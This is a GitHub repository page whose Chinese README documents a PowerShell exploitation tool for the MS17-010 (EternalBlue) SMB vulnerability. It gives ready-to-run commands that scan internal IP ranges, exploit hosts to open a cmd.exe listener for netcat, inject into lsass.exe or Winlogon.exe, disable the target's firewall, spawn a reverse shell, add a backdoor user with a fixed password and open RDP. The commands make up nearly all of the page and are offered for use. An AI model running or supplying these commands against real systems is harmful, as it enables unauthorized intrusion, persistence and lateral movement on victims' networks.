Skip to content

VMsec/POMS17010

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

原生脚本的快速使用 注:需要使用Powershell 7

-m //加载模版
-process //指定要注入DLL的进程 默认为lsass.exe
-Port //指定攻击端口 默认445
-x //指定要攻击系统位数
-fs //批量探测内网是否存在ms17010
-target //指定扫描的IP段

批量监测是否包含MS17010漏洞

Import-Module .\Invoke-Ms17010.ps1
checkMS -fs 1 -target 172.16.224.0-172.16.224.255

image-20220818022507867

Check目标(必须执行 如果目标为XP系统则需要将OS指定为0,如果非XP系统则将OS指定为1),如果利用成功则返回系统位数,执行结果如下图所示

Import-Module .\Invoke-Ms17010.ps1
checkMS -target 172.16.224.15 -OS 1

image-20220818022852790

使用如下命令,可以在目标的666端口上面开启一个cmd.exe的监听并用NC进行连接

Import-Module .\Invoke-Ms17010.ps1
attackMS -target 172.16.224.15 -x x64

image-20220818023049851

如果对方开启了防火墙会导致我们不能直接获取shell,但是我们可以加载firewall模版来关闭目标的防火墙

Import-Module .\Invoke-Ms17010.ps1
attackMS -target 172.16.224.15 -x x64 -m firewall

当然你可以在关闭目标防火墙之后 反弹shell

Import-Module .\Invoke-Ms17010.ps1
attackMS -target 172.16.224.15 -x x64 -m firewall -process Winlogon.exe -Reshell 1

添加用户testoaa HjjLJjj@123

Import-Module .\Invoke-Ms17010.ps1
attackMS -target 172.16.224.15 -x x64 -m useradd

开启3389并在防火墙放通行

Import-Module .\Invoke-Ms17010.ps1
attackMS -target 172.16.224.15 -x x64 -m openrdp

参考链接 https://github.com/1135/EquationExploit

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published